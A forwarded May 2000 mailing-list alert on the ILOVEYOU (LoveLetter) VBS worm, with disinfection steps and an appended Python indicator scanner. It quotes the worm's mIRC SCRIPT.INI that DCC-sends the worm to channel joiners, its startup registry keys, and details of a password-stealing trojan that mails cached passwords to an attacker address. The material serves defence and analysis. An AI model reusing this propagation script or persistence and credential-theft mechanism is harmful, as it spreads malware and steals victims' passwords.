How to remove LOVE-LETTER-virus

From: Sipke de Wal <sipke_at_wxs.nl>
Date: Thu May 4 17:50:04 2000

This is what I received from a friend and
I will hereby forward for your benefit

Sipke
Virus Name: VBS/LoveLetter.worm
Aliases: none known

Characteristics:

This worm is a VBS program that is sent attached to an email with the
subject ILOVEYOU.
The mail contains the message "kindly check the attached LOVELETTER
coming from me."

The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs

If the user runs the attachment the worm runs using the Windows
Scripting Host program. This is not normally present on
Windows 95 or Windows NT unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following
places :-

C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry keys :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs

in order to run the worm at system start-up.


The worm replaces the following files :-

*.JPG
*.JPEG
*.MP3
*.MP2

with copies of itself and it adds the extension .VBS to the original
filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
contain the worm.

The worm also overwrites the following files :-

*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA

with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm
and this is then sent to the IRC channels if
the mIRC client is installed. This is accomplished by the worm replacing
the file SCRIPT.INI with the following script :-

[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}

After a short delay the worm uses Microsoft Outlook to send copies of
itself to all entries in the address book.
The mails will be of the same format as the original mail.


This worm also has another trick up its sleeve in that it tries to
download and install an executable file called WIN-BUGSFIX.EXE from the
Internet. This exe file is a password stealing program that will email
any cached passwords
to the mail address MAILME_at_SUPER.NET.PH

In order to facilitate this download the worm sets the start-up page of
Microsoft Internet Explorer to point to the web-page containing the
password stealing trojan.

The email sent by this program is as follows :-


From: goat1_at_192.168.0.2
To: mailme_at_super.net.ph
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: goat1
Username: Goat1
IP Address: 192.168.0.2

RAS Passwords:...
<password information goes here>
...
Cache Passwords:...
<password information goes here>
...

goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:

MAPI : MAPI



The password stealing trojan is also installed via the following
registry key :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX

to auto run at system start-up.

After it has been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE



Date Discovered: Thursday May 4th 2000
DAT included: 4077
Risk: High


> How to disinfect : Virus "I LOVE YOU"
> >
> > 1/ Kill all processes called "wscript.exe" from the Windows NT
> > Task Manager or from the running applications taskbar.
> >
> > 2/ Execute the "regedit" program from "Start" menu/"Run..."
> > 3/ Using this program, go to
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and
> > remove the entry containing MSKernel32.vbs
> > 4/ Do the same with
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
> > and Win32DLL.vbs
> >
> > 5/ Go to "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" and
> > change the value of "Start Page" to "about:blank"
> >
> > 6/ The virus also infects files on network drives by writing the virus
> > script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
> > hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
> > network drive, looking for the string "loveletter" (in the field
> > "Containing text:").
> >
> > Look in your sent items to check to whom you sent the virus.
> >
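As an added illustration of step 6 and of the SCRIPT.INI hijack described above (example code written for this archive page, not part of the original alert), here is a Python scan that walks a directory tree and flags the file-level indicators the alert lists: media files renamed with a .VBS double extension, script or media files containing the string "loveletter", and an mIRC SCRIPT.INI that DCC-sends LOVE-LETTER-FOR-YOU.HTM on JOIN. The sample tree it builds holds constructed placeholder bytes, and the function names are my own.

```python
import os
import shutil
import tempfile
# Extensions named in the alert: scripts the worm overwrites, media it replaces.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".css", ".wsh", ".sct", ".hta"}
MEDIA_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}
MARKER = b"loveletter"  # the string step 6 tells you to search for

def classify(path):
    """Return a reason if `path` matches one of the alert's indicators, else None."""
    base, ext = os.path.splitext(path.lower())
    # PICT.JPG -> PICT.JPG.VBS: a media file replaced by a copy of the worm.
    if ext == ".vbs" and os.path.splitext(base)[1] in MEDIA_EXTS:
        return "media file replaced with .VBS copy"
    with open(path, "rb") as fh:
        data = fh.read().lower()
    if ext in SCRIPT_EXTS | MEDIA_EXTS and MARKER in data:
        return "contains 'loveletter' marker"
    # mIRC SCRIPT.INI rewritten to DCC-send LOVE-LETTER-FOR-YOU.HTM on JOIN.
    if os.path.basename(path).lower() == "script.ini" and b"love-letter-for-you.htm" in data:
        return "mIRC script.ini sends the worm on JOIN"
    return None

def scan(root):
    """Walk `root`; return {relative path (with '/'): reason} for suspicious files."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            reason = classify(full)
            if reason:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = reason
    return hits

def demo():
    """Scan a constructed sample tree (placeholder bytes, not real worm code)."""
    root = tempfile.mkdtemp()
    samples = {
        "PICT.JPG.VBS": b"' constructed stand-in for the LOVELETTER vbs copy",
        "notes.js": b"var s = 'loveletter'; // constructed stand-in",
        "clean.js": b"function f() { return 1; }",
        "mirc/script.ini": b"[script]\nn2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\n",
    }
    for rel, data in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    hits = scan(root)
    shutil.rmtree(root)  # remove the constructed tree again
    return hits
```

Point `scan()` at the root of a mounted network drive instead of the constructed tree to reproduce the "Find" the alert describes. The Run/RunServices entries and the Internet Explorer start page are not files, so steps 3 to 5 still have to be checked in regedit by hand.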
Received on Thu May 04 2000 - 17:50:04 BST
